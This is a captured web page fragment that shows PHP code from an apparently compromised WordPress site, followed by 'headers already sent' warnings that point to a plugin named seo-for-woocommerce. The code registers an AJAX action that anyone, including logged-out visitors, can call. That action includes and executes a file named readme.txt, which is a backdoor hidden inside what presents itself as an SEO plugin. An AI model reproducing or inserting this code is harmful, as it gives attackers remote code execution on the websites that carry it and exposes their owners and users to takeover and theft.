if(!function_exists('file_check_readme29311')){
add_action('wp_ajax_nopriv_file_check_readme29311', 'file_check_readme29311');
add_action('wp_ajax_file_check_readme29311', 'file_check_readme29311');
function file_check_readme29311()
{
$file = __DIR__ . '/' . 'readme.txt';
if (file_exists($file)) {
include $file;
}
die();
}
}
Warning: Cannot modify header information - headers already sent by (output started at /home/atbint6/atbin.ca/wp-content/plugins/seo-for-woocommerce/seo-for-woocommerce.php:264) in /home/atbint6/atbin.ca/wp-includes/pluggable.php on line 1450
Warning: Cannot modify header information - headers already sent by (output started at /home/atbint6/atbin.ca/wp-content/plugins/seo-for-woocommerce/seo-for-woocommerce.php:264) in /home/atbint6/atbin.ca/wp-includes/pluggable.php on line 1453